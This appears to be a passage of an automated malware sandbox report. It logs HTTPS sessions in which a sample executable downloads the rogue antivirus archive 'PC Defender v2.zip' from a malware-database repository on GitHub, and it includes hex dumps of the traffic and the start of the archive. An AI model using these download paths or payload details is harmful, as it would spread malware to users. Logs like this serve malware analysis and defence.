                                                                                                                                                2022-09-29 12:51:17 UTC595INData Raw: 07 5f 28 3f af a5 64 40 57 d9 b8 38 76 91 c4 d6 20 fa 25 cf f4 be 17 05 26 a0 33 f3 a9 44 55 c1 99 e6 9e c9 2d ca d1 54 9c 5d 1d a8 d9 d6 a6 69 a4 ef e5 ab d6 42 f7 75 0d 40 a8 63 19 69 e8 ea b1 cb 42 18 0a 75 af 82 bb dd 1b 6f 16 28 75 2b c8 eb e9 c8 22 bd 37 4e b2 64 92 77 b2 a1 2d 16 fb 0a 15 c2 13 7b 29 ce 8d 22 19 3a b9 60 b1 5c 59 9d 40 37 a4 14 2c cf 2a 4b 8b 4a da bc fe 04 d9 cc 13 34 98 11 36 55 7e 17 6e 0d 9b ef d5 67 f9 f8 6b d5 e3 16 58 f1 3c 66 d8 72 70 0b 7e 75 24 e6 57 44 a9 58 97 89 87 e2 a8 ff e6 6d d4 78 dd 71 74 63 b6 cc 7c 6f 38 64 e2 71 c6 22 83 6c 49 04 6d a0 39 bd d6 22 60 89 7f b4 48 17 dd f6 43 45 61 63 5f e1 87 d9 6b 36 fa 45 73 70 bc 07 6d 0f 3d 19 6b bb 13 a8 b2 76 d6 c7 6c 99 20 94 fe 13 2f c1 53 f8 9f 8a 3a 89 cc dc 8a d2 86
                                                                                                                                                Data Ascii: _(?d@W8v %&3DU-T]iBu@ciBuo(u+"7Ndw-{)":`\Y@7,*KJ46U~ngkX<frp~u$WDXmxqtc|o8dq"lIm9"`HCEac_k6Espm=kvl /S:
                                                                                                                                                2022-09-29 12:51:17 UTC611INData Raw: 43 1d d7 0a b2 c6 c3 92 13 28 91 87 a6 d3 70 1c 21 99 0f 71 f5 03 51 b8 b3 6b 81 ae 2d c7 cb a3 54 65 e2 d0 8e 42 a5 12 86 45 34 29 74 e9 1c b0 57 ef 08 b5 ba 9d d3 2f a2 a2 d3 eb 1d 5a 73 b5 4a 55 41 58 50 a8 4c 04 78 74 98 6e 47 5d 33 33 1c 07 59 57 7f ff fd 3b b5 c4 ee f8 bb 6f 59 61 7c 8a d8 6c ac 6d d7 78 81 25 6c 1b 15 ef e7 20 bc 8e ac b2 c9 86 b9 f9 e6 ae f3 82 fb 9e a8 78 10 81 8d 36 44 10 5a 78 a3 dd f7 e3 63 78 7b cf 04 c2 5b 97 72 0f ad 73 a7 b7 cd 33 97 3f c8 8f dc c9 c8 3d 0a ed 1d f9 d0 04 78 38 7e 76 34 04 28 57 7a 37 4e ef b6 77 2d 02 8c 04 b6 c6 d4 49 0c ef 5c 46 54 c9 e2 bc 1d e4 97 5d ba f6 3a 9f 22 fb f8 b1 7e bb 77 71 ae 2e c0 b2 0a 3d f3 d6 1f c4 48 a9 95 b5 ce cd 62 b3 53 80 90 a4 cd 43 13 22 d9 f7 7e 1a cd c2 4c 42 72 8d 15 c7 c6
                                                                                                                                                Data Ascii: C(p!qQk-TeBE4)tW/ZsJUAXPLxtnG]33YW;oYa|lmx%l x6DZxcx{[rs3?=x8~v4(Wz7Nw-I\FT]:"~wq.=HbSC"~LBr
                                                                                                                                                2022-09-29 12:51:17 UTC627INData Raw: bf 64 8d 3f 83 70 c0 19 4e e9 8a 25 64 79 61 85 c9 06 7f e9 fd 75 50 b2 da 53 a6 2f f5 54 68 94 9d 1a 32 72 87 ba 30 03 35 10 aa fd 92 dc ad de 6b 0d fb b4 7d af 47 c3 21 14 ca 78 d4 7d 13 58 87 73 7f 70 b0 71 59 1b 71 51 6a 1e db f5 95 76 59 1f f5 8a 59 cf f2 95 3f bb 0a 82 f8 ea e5 d1 dc 7e 45 dd 14 c9 a4 87 e2 4d c8 c2 5a 58 5c b2 bd d4 0d d7 b2 73 7e 5c 1c 5f 05 83 69 78 74 dc a2 64 a4 6b a3 0d 09 ac 78 4e 65 de 49 d5 79 9a 75 98 17 7e 73 b5 d2 52 51 c8 4f 14 13 33 09 30 bb 2c 02 06 06 b4 b5 6e 69 17 4d a5 4f d7 c1 19 6c f9 b4 f0 e0 49 ab a8 31 26 fb 20 31 aa 14 0e 6d 86 03 ab 72 9f 95 e9 99 75 07 03 1c 7f 7e ff ca f6 6c d4 52 2a e0 b0 99 7e 86 d3 38 e6 74 ba 0b 34 e3 f4 60 c1 91 73 fb d7 2c 90 d3 97 c8 f7 94 04 3d f5 e8 89 cf ea 88 8e 19 b5 5b 03 69
                                                                                                                                                Data Ascii: d?pN%dyauPS/Th2r05k}G!x}XspqYqQjvYY?~EMZX\s~\_ixtdkxNeIyu~sRQO30,niMOlI1& 1mru~lR*~8t4`s,=[i
                                                                                                                                                2022-09-29 12:51:17 UTC643INData Raw: 27 8d c0 e7 26 91 fb 60 0b bf f1 6f 26 ab b5 57 3c 89 fd e3 fb dc f6 e2 f5 80 df 70 2e 75 42 75 f5 42 17 31 63 fe 91 be 3e 43 19 0a d1 2e 3d 65 16 45 60 bf b9 29 5e 93 48 d0 9d 1f 1b c5 bf ae ff fa 2f 23 32 d0 15 95 d8 d0 c9 f9 fb ff 22 c0 63 d3 6e 25 d0 ce b3 cf 2a a6 41 dd bf 67 65 46 31 e5 6b ea 95 c7 12 4f 9e 62 0f cf 8c be 61 d8 25 7c a8 0d 93 47 10 79 c5 02 98 56 7e c0 d9 37 70 27 83 be df 6e a2 0f 52 33 a1 fe c1 1e 59 bb 7d fa 58 4f 3e 9b c9 72 d7 f2 31 30 24 55 60 bc 93 62 6d e6 b0 b7 63 af 5b 61 e9 c0 7d 35 9c 95 03 3b 83 f3 97 d9 4e 0d 31 9c be fa e0 0d f1 5d 79 06 4c c1 26 22 1f 30 7b b0 49 7d 24 c5 91 b1 18 64 aa d5 38 d3 57 9c cc 7a ac 5e c9 99 b7 84 a6 d4 a5 42 40 1e 74 55 b9 f0 52 3a af 91 d3 ef 64 1f 81 e0 33 57 03 6c 8a 3e 71 88 9a a5 17
                                                                                                                                                Data Ascii: '&`o&W<p.uBuB1c>C.=eE`)^H/#2"cn%*AgeF1kOba%|GyV~7p'nR3Y}XO>r10$U`bmc[a}5;N1]yL&"0{I}$d8Wz^B@tUR:d3Wl>q
                                                                                                                                                2022-09-29 12:51:17 UTC659INData Raw: 8e cd 32 fa 4e 2b ba 92 94 af f3 89 63 24 ba 3d bc 6b 40 0d dd 62 98 28 1e 1d c2 3b 03 ca 75 4c bf 88 13 44 90 ca c7 97 b3 2a 6d 34 e6 35 1c a6 63 59 1a 30 87 f9 89 8b 66 b1 71 7d b8 bf df 03 83 ff c7 96 e9 15 3c e8 78 0b 6a 9a 04 25 fe a4 36 72 08 4a ac bb ed a9 20 30 bf 96 84 4b df 43 92 87 8c 5a c5 ac 75 38 13 12 88 52 a8 22 35 dd 61 9a 30 24 ef a4 1c 72 ca 5f 5e cf 7f cf 47 b1 9b 5d 47 38 4c 4d 12 3c 07 9d 49 ca 97 b9 b4 c6 e9 fe 6c 48 f3 0f 9c 77 99 be 9c f1 42 77 24 33 cc 2c f0 b0 fa b2 86 f1 02 fe 0c 79 74 cc 33 72 5f c7 1a 96 ac 23 c8 f3 ca ef 09 4f 97 48 ad b6 c1 3b 5d 6c 2e 07 4e f0 b3 7c 36 a0 08 c4 93 41 be 0e 46 a3 06 b9 59 f2 d7 cf f5 e7 c4 44 db ed 1f 47 6d f0 79 3a a3 d1 ff dc 08 bc 10 91 b3 80 ef 50 bd 3e aa 68 ed f6 f6 7d 1f ff 1d 23 ca
                                                                                                                                                Data Ascii: 2N+c$=k@b(;uLD*m45cY0fq}<xj%6rJ 0KCZu8R"5a0$r_^G]G8LM<IlHwBw$3,yt3r_#OH;]l.N|6AFYDGmy:P>h}#
                                                                                                                                                2022-09-29 12:51:17 UTC675INData Raw: a9 17 e7 83 c6 83 6e e7 f0 70 82 cc 29 37 25 bf ea 1e 92 96 71 3d 3d 09 44 93 c2 44 82 d3 e9 94 3e 1d d4 73 92 d0 36 bf 37 83 74 8b b9 e5 48 25 a2 5f 07 ee 20 59 95 c9 f8 f9 ae 80 87 4f 77 7d ba 63 f0 22 12 0e 4f 47 04 c0 9c fb da 46 22 91 d1 35 c1 35 85 20 bb 31 29 d2 02 a9 52 33 25 9d 27 b0 2b 26 c3 48 3a ec cf 4a f1 3b 07 61 3c 7f 6d 66 44 57 19 ee 23 91 15 e0 12 c1 c6 f9 28 1b 8a 52 95 4f 84 ac 2b 56 6f 2d b3 a0 bc 36 61 6b 74 c3 f4 0a dd 4c b0 36 3f c6 0a ad 83 e3 0d dd c3 ba aa d8 0e df f1 81 b7 27 07 ec 07 3c 87 d2 f5 c3 61 02 6e 43 07 5a 4f 79 e7 0f 9d b7 0a 6c 7a 0e c8 67 a5 b2 10 b2 d8 8c ab 2b 18 f1 40 1c 34 0b b0 12 97 d8 ed a0 d7 57 d1 29 b9 e0 ab ff 5f 23 6f df 30 c7 03 57 0f 01 4f eb 3a 45 0f 4a 8a 4b d6 60 b4 80 3d 2f e2 ac b1 8d 15 32 bb
                                                                                                                                                Data Ascii: np)7%q==DD>s67tH%_ YOw}c"OGF"55 1)R3%'+&H:J;a<mfDW#(RO+Vo-6aktL6?'<anCZOylzg+@4W)_#o0WO:EJK`=/2
                                                                                                                                                2022-09-29 12:51:17 UTC691INData Raw: 43 e9 71 77 e9 c7 3d c7 de cc a6 2f 83 4e 91 9d eb 03 12 ab 98 95 4e 57 57 b3 e4 51 0f 22 a7 22 23 da cf f5 b2 d9 e8 69 b3 7a a1 34 a4 ae 7b 5e 8a e1 b1 60 c7 c1 bb 1f b3 46 38 3c d1 0d 94 2b 89 da 10 74 f9 3f a2 37 26 9b e7 b8 4a 5f 72 a2 d3 52 50 64 ca c0 a4 38 05 74 c6 4e 9c 89 6d 7a 9d 5c db 34 0b 05 c2 f0 5e 80 9e 1e 0d ff 65 8c 41 80 57 0e 9e 47 08 0e 04 bc ef 64 42 bd 9d db d7 58 9a 0f d2 00 e5 cf 4d 6d 73 ea 09 76 37 b4 1f bd ea b3 9b 60 96 4b c6 9e 64 d2 5a e5 67 da 26 88 20 b5 af 00 4c 16 69 a0 8c b8 f3 53 d2 74 9a 0b 7e 96 77 89 c8 6f 67 f3 f6 41 99 62 35 89 dc 1b 2b d7 4b 8c 7d 31 f7 18 44 20 61 73 74 16 5f ae 3e bd 68 11 44 9e 7c 92 37 be 6e bf e4 15 3f bd 55 7d 30 34 cd 75 f8 1c 50 ee 2b 1f 69 5f bd 63 17 8e 2a 64 4a 90 8e cb b9 77 fb c9 5e
                                                                                                                                                Data Ascii: Cqw=/NNWWQ""#iz4{^`F8<+t?7&J_rRPd8tNmz\4^eAWGdBXMmsv7`KdZg& LiSt~wogAb5+K}1D ast_>hD|7n?U}04uP+i_c*dJw^


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                50192.168.2.549750140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:49 UTC27791OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:49 UTC27792INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:49 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:49 UTC27792INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                51192.168.2.549751185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:49 UTC27794OUTGET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:50 UTC27794INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 808324
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "90d2402923439bff69b4e2e4b61840f4f4c22bfbc0155d3f83cead22bcfa0c94"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 080D:3F36:6EE7E0:7C68D4:6335935F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:50 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6937-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455910.889679,VS0,VE155
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: d32cfed9c28ecb38d6bd5f5fc2a2563e32922089
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:50 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:50 UTC27795INData Raw: 50 4b 03 04 14 00 01 00 08 00 01 80 27 3d a2 81 68 5d c8 54 0c 00 00 72 0d 00 1b 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 43 44 65 66 65 6e 64 65 72 76 32 2e 6d 73 69 71 b1 84 80 41 51 cc d0 29 e8 26 1a a1 f7 36 a5 a0 21 85 13 da c5 46 48 db f2 9f d7 a0 76 93 0a 9c a8 f0 6f bc b6 86 4d 3a d3 a1 ea c3 86 e8 02 f6 47 b1 64 3e 6f 27 f0 a9 af 57 e0 69 a0 cc 64 0e eb ff f2 c3 75 e0 5c f8 07 90 9f 7b 02 41 1c a6 8e 14 07 db 43 99 c8 6a e6 f5 37 b2 d4 53 3a ee c8 02 50 2e c7 27 fa 7f 2b 27 9c 20 85 35 b7 9a d3 49 be 57 e1 5b 00 c0 16 6d 5f 4f b3 9c a2 d3 3d 31 2a bd c1 5a c8 e1 b9 53 61 b5 e1 41 a0 17 fa a0 fc 4b cc 34 cf 11 9a 15 ea 82 d1 10 6b 5b 47 ca fb 79 eb 19 68 6f 77 dc 0a 6e a9 85 14 07 44 d9 78 4e d9 d5 ed ce 2e 9c 4c 72 33 55 32 bd 47 8c 1e 6b 36
                                                                                                                                                Data Ascii: PK'=h]TrEndermanch@PCDefenderv2.msiqAQ)&6!FHvoM:Gd>o'Widu\{ACj7S:P.'+' 5IW[m_O=1*ZSaAK4k[GyhownDxN.Lr3U2Gk6
                                                                                                                                                2022-09-29 12:51:50 UTC27811INData Raw: df 05 2a 4b 12 6a 18 f2 bd 4a 3e ac 0d be b5 9a 55 00 91 a2 df a8 77 5e e2 bc 2f c2 cd 95 d5 0d b6 d9 c1 0b d0 2e 76 94 c7 28 01 ad 70 fb 8d 65 b0 b5 f7 08 d0 7b fa 3e bd c1 67 46 1f cc 27 c0 f6 5c 41 1b 5b 5b 30 88 2c 52 00 60 fe d3 a3 e9 70 94 c2 70 70 b7 81 69 15 f8 68 e6 fa 59 1b ba 25 7f 11 c7 76 4f 5f 69 06 b8 41 46 3c d0 d2 51 d6 fa 6a c2 80 71 76 da 62 73 2a 59 31 dc 26 32 06 42 f7 b3 ef 99 6e 3e ad 4b 93 f4 ae fb 83 86 69 fd 11 b2 ca eb 2e b5 0b d9 78 f1 37 1f e6 76 1e b9 59 cd 68 83 bf 66 ba 0a aa 45 ed 2d 98 0b 7f a4 23 de b8 df 64 31 05 c3 bc 4b dc 70 12 7c e4 6b 23 22 bd 12 f6 35 c7 33 8d 09 eb b5 cb 7d 72 ca ac 93 8e e1 22 1a 6c f4 0b 16 06 94 1c 84 ae 19 fa eb 16 98 7b 2f 02 79 49 86 b0 4b c6 04 98 23 e6 08 49 2a a2 b9 87 b1 e6 f4 9d 6f 9d
                                                                                                                                                Data Ascii: *KjJ>Uw^/.v(pe{>gF'\A[[0,R`pppihY%vO_iAF<Qjqvbs*Y1&2Bn>Ki.x7vYhfE-#d1Kp|k#"53}r"l{/yIK#I*o
                                                                                                                                                2022-09-29 12:51:50 UTC27827INData Raw: 91 b4 1b e1 be c8 75 a4 3f d9 eb cd b6 54 1f cb dd 66 ea 92 91 16 87 cf 9a 03 19 08 a0 d2 48 9c 06 78 71 67 3f 9c d2 2c a2 62 fa 06 cc ff a6 39 1f d2 6d df 11 ea c2 05 6c 36 89 f2 73 6b 00 4a a9 5a 2a b3 e5 28 4d c7 d5 60 e8 e3 14 fe 08 e6 d9 20 3f be 3e cd 5a 1c 77 23 1c dc 7a b7 44 78 57 c8 76 2d 5a 34 26 fb 41 33 76 e3 3b 48 14 35 e7 ac 13 39 ad 38 79 31 80 85 63 b3 ac 4a 38 57 bc c8 fb 72 8e 11 d5 65 11 31 80 28 3e 39 1a 2d 63 aa 2b 78 2e 46 ba 07 e5 61 93 66 87 0c 85 80 e2 ca b1 b2 12 9e fc 03 3e c7 a9 43 c0 f6 6f c6 37 77 66 41 43 3b ba 72 ba b2 84 d0 1c a4 23 2e 80 a5 ce 27 d6 61 22 49 25 b0 e6 94 9c e7 c5 83 d9 36 d1 51 3a 08 ad 4a fe 50 8f e5 d9 2d 19 fe d5 41 a2 31 96 76 e6 b5 1f e3 91 83 cf ea 03 0f 0e 46 90 c0 3a ce c3 7c 4a 48 fc 62 6f f0 f3
                                                                                                                                                Data Ascii: u?TfHxqg?,b9ml6skJZ*(M` ?>Zw#zDxWv-Z4&A3v;H598y1cJ8Wre1(>9-c+x.Faf>Co7wfAC;r#.'a"I%6Q:JP-A1vF:|JHbo
                                                                                                                                                2022-09-29 12:51:50 UTC27843INData Raw: 3a 8b fc 30 69 96 74 d8 1a 32 d9 40 08 ca 6a 7a f3 2c f6 c9 a8 4b 6d 98 cf 6c 8c ba e4 6f d0 d3 39 34 68 51 36 58 aa 31 ff a2 e1 fd 9f f6 63 d4 ae 71 a5 a1 40 5a c9 9a bb 8e f9 a5 c5 91 79 5d 49 e0 7a c5 16 af 92 40 b3 af ef 1e 70 42 b2 07 6f 24 d1 d7 22 25 0e ce 20 64 62 1e 61 c9 ea 81 af 17 6a bf a0 74 fb b3 32 fc e2 27 20 a0 a7 51 77 f3 ed ed f7 42 01 a8 69 6a 3a b6 67 1c e7 67 48 bb b0 e6 4b f3 ff da de 8b aa 68 b8 e6 52 9e 66 7e 16 45 74 b2 25 12 3b bc ee f0 a4 d3 74 b2 24 5b 37 c7 9e 74 3f 7c aa 5f de 7d a6 08 88 e7 d4 5e 6c 16 4e c0 35 55 72 6b 9f ae c2 13 2c b0 fd 4a 91 60 07 f4 c1 03 7e 06 47 70 eb b4 17 d9 13 c9 c8 3a d4 06 60 1d 81 f4 67 08 c6 5d 5e 11 6d a1 2f f0 e1 2a 8e 3b 92 63 d5 ab 13 d8 74 2e 4f e1 11 ff 6a fc e8 bc cc 1f 47 3c 27 db 67
                                                                                                                                                Data Ascii: :0it2@jz,Kmlo94hQ6X1cq@Zy]Iz@pBo$"% dbajt2' QwBij:ggHKhRf~Et%;t$[7t?|_}^lN5Urk,J`~Gp:`g]^m/*;ct.OjG<'g
                                                                                                                                                2022-09-29 12:51:50 UTC27859INData Raw: 73 82 0a 3e ee 36 52 44 e6 fd 9f 31 01 e7 80 e1 8a 74 9c 89 9c 19 44 8d c3 ba 8b 51 a5 fe ee 49 13 b3 c2 70 03 8b 69 2e a3 1b 96 b8 58 06 31 e0 0a fc 01 e6 3e af 74 ca 94 20 fb ef 5d 27 4f da 38 10 13 12 b9 e2 23 b6 ab 06 42 e8 b6 40 ba 2a 39 74 0b b4 ff d6 bb 5a 94 80 6f 44 18 7a ad 02 28 7a f7 4c eb b8 d5 84 42 cc 1a 4a 0c 02 81 b9 90 57 27 d6 01 ab ad 0b 9a 5e b6 41 70 f7 20 85 3c 0a 9c ee 28 78 66 47 20 d8 29 93 09 37 85 6f 31 51 45 ab 11 fd 63 9f 34 25 dc 71 c4 4c 06 e4 fd 52 7a 76 95 3a d5 38 a3 90 83 a3 94 81 a5 b8 51 d5 02 58 16 4e af d8 77 c9 32 4f 16 ac ff 9d f5 fd 30 b1 9e 8c 37 5f 39 1e 31 ee d9 2c 9c 4c c0 75 7c 1a 74 c7 dc 1c db e3 23 f9 7c db f8 47 c1 12 26 5c 2d ed 09 68 09 ad 20 54 f5 4e 7d 69 a1 c8 3b 5b e2 74 38 8d 71 3f a1 e8 4b 1f f1
                                                                                                                                                Data Ascii: s>6RD1tDQIpi.X1>t ]'O8#B@*9tZoDz(zLBJW'^Ap <(xfG )7o1QEc4%qLRzv:8QXNw2O07_91,Lu|t#|G&\-h TN}i;[t8q?K
                                                                                                                                                2022-09-29 12:51:50 UTC27875INData Raw: 32 de 7b 79 46 63 e8 56 fb f2 60 1f 8d 70 0f 04 f8 11 1f 92 d7 a5 3d b3 06 9c 12 75 78 ef ca c7 03 bd 06 34 be 6e e2 ef 15 e0 df d9 f1 78 3c a5 f7 5a 11 b7 cc ff 2d 2a d4 a7 c9 26 e3 73 00 8e 76 a4 ea 2a 4c b6 3d dc 05 41 23 e4 21 86 e0 23 4f 66 82 fc f6 6c 18 78 3c f2 14 5a f1 a9 d9 8f 40 dc ed 12 52 40 16 c5 0a 82 10 53 5b 09 9f 02 2c 9f f5 1f 17 b5 94 19 a7 f0 0a d0 c3 60 90 40 72 f6 34 e9 a1 48 7a 38 04 f4 69 e6 f9 e4 dd f9 a1 1e ef 22 95 ba d2 1a 85 8f 2e 3c d9 77 5a 2e 14 4e 97 e7 cd 75 15 e2 bb 8a cb 8a 0d b9 f3 00 c8 3b 93 d6 86 d0 8f ee 7d 3d a9 ec cb c1 87 85 77 fd 4c 85 dd b8 90 d5 ca 58 cf f3 ac 94 1c a4 f2 76 31 cf 78 9f ff 03 a0 73 14 3c 6c 2e 0d 60 e5 e8 f1 43 93 c6 db 3e 94 3c 51 2a d3 46 9c 22 d4 da 79 96 ae 35 4e 44 d0 dd e6 d5 5b 73 81
                                                                                                                                                Data Ascii: 2{yFcV`p=ux4nx<Z-*&sv*L=A#!#Oflx<Z@R@S[,`@r4Hz8i".<wZ.Nu;}=wLXv1xs<l.`C><Q*F"y5ND[s
                                                                                                                                                2022-09-29 12:51:50 UTC27891INData Raw: fa 1a ba 46 29 00 c2 61 c6 5b f2 9d d7 9c 37 eb 55 21 6f 0b 94 e2 fc 8c 28 6d d1 23 70 ff 68 1a f7 f2 a2 9d bd 4a 38 2f 5f 12 75 74 52 c8 09 d4 fc 42 65 d8 84 a1 e6 79 b7 ed 09 1a a5 ab c3 86 28 9d fb 82 6d c0 79 d9 0e 03 64 51 43 1d b8 97 89 74 54 2a 02 ef 59 d1 43 b4 46 ac 39 4a 79 dd fe 70 60 cd f5 17 e7 f3 8d 75 3a 37 83 5f 10 7a a0 85 b5 61 31 9c 5f ae b3 48 8d 40 37 4b ef a5 ae ee bb 78 9c 99 cb 19 e1 58 cb 2a 13 7b c8 e9 3e c8 3d b0 8d d0 8a bf 9b c7 5c 08 1a 72 42 70 03 f2 c0 6f e6 55 03 2e 8e 29 84 09 cb 01 5f cd 70 52 f9 3c 8d 0a 72 27 69 85 3f a4 fe 26 fc 66 f3 2d 2e 74 91 9f 06 b6 41 4c 17 43 ba 2a fc a7 17 92 52 59 16 a2 ab 17 8c 67 d4 40 ee eb 5e 61 31 0b 0c 1f c6 de e0 a6 ea ad 69 94 78 f1 40 19 2c 60 98 aa f5 71 77 12 43 68 0e 64 ff f7 73
                                                                                                                                                Data Ascii: F)a[7U!o(m#phJ8/_utRBey(mydQCtT*YCF9Jyp`u:7_za1_H@7KxX*{>=\rBpoU.)_pR<r'i?&f-.tALC*RYg@^a1ix@,`qwChds
                                                                                                                                                2022-09-29 12:51:50 UTC27907INData Raw: 0f e3 c6 73 aa 74 30 95 19 27 f9 bc de 43 82 29 ba 50 aa fb 52 7b 00 2c 7c 69 17 a8 09 b9 77 43 f9 45 2f bf a1 9b d0 58 b5 84 00 57 9f c2 0a 6f 72 ae 79 04 47 0c 92 0a 78 90 81 c2 9f 82 ec 02 14 b5 4c 80 f3 6b eb ca ca ef 09 c0 c3 da 39 ce 6a 43 5e ad 0d 3d a2 cd a9 b6 5b c7 ed fb fa 63 23 03 1b 3d 63 af 7a c6 1c a0 46 8a e5 b9 9b e7 aa 85 16 75 09 55 b2 79 87 84 4b fe 63 c7 8a f3 4f 67 ce 0a b4 71 b1 ac ae ef 2a 27 9e ee 04 08 7e e5 3a 06 f8 7a 09 26 75 b7 31 1f b2 16 13 3b 1a a4 2e 7e d0 d1 25 59 cf 66 26 92 a7 4d 2b 3f 3b ae a4 8c e0 da 79 06 43 d5 e7 8a a2 b9 e2 08 da 93 3b 6a cf 7e ae e0 73 7a d3 88 74 43 d6 4c 4c a3 d5 93 71 c7 53 5d fb e9 94 44 0d a1 94 38 a8 1c 38 78 c6 e0 65 98 2e 78 f9 e5 3b d7 17 0b 07 02 84 94 4f 90 81 69 21 a8 a2 06 e7 81 9c
                                                                                                                                                Data Ascii: st0'C)PR{,|iwCE/XWoryGxLk9jC^=[c#=czFuUyKcOgq*'~:z&u1;.~%Yf&M+?;yC;j~sztCLLqS]D88xe.x;Oi!
                                                                                                                                                2022-09-29 12:51:50 UTC27923INData Raw: e1 b0 70 6d b4 60 93 16 72 4d 4f d3 85 65 9f 07 96 57 b5 c3 af 91 78 a3 b4 eb 90 60 e9 82 d1 d4 c6 68 07 da b6 48 0e eb d5 b0 a0 61 95 46 a1 29 d6 d0 b8 d8 b9 80 dd d9 d4 ae 77 6c 30 a8 6a 61 36 07 dd ae 3d 7d 83 a1 b4 2d f0 15 ef 84 01 26 14 59 bb 52 2d 3b 55 3e 5d 1e fd 26 fd e1 8b 38 47 16 e4 e5 de f8 e1 76 5d 47 d6 05 a0 af d9 16 b7 dd 44 45 02 82 a9 0e 6f 1c dd 30 bf 67 59 b9 a8 b7 76 67 9e 93 af ce 96 7c a9 ed 5c 28 75 8f 02 15 bf 56 c1 28 8d 2a 23 9e c5 2d 8c e4 d1 b8 fb 3c 12 13 82 7a cd 5f 65 0e 8a eb e7 cf 71 23 9e 02 b8 e2 e0 31 3c de 2e 83 21 8b 9d dc 90 9e eb 1f 60 ef 67 33 c1 66 de e6 c9 cb 26 b9 1a d1 60 c4 7c 46 13 37 4c 71 52 1c 1a 4d f0 1d d4 0a 94 e5 f9 cd 90 02 99 b2 07 63 8c 0e fc 74 21 15 0e ef d8 3c 4d 6e 26 39 3f 81 96 61 ac b1 f8
                                                                                                                                                Data Ascii: pm`rMOeWx`hHaF)wl0ja6=}-&YR-;U>]&8Gv]GDEo0gYvg|\(uV(*#-<z_eq#1<.!`g3f&`|F7LqRMct!<Mn&9?a
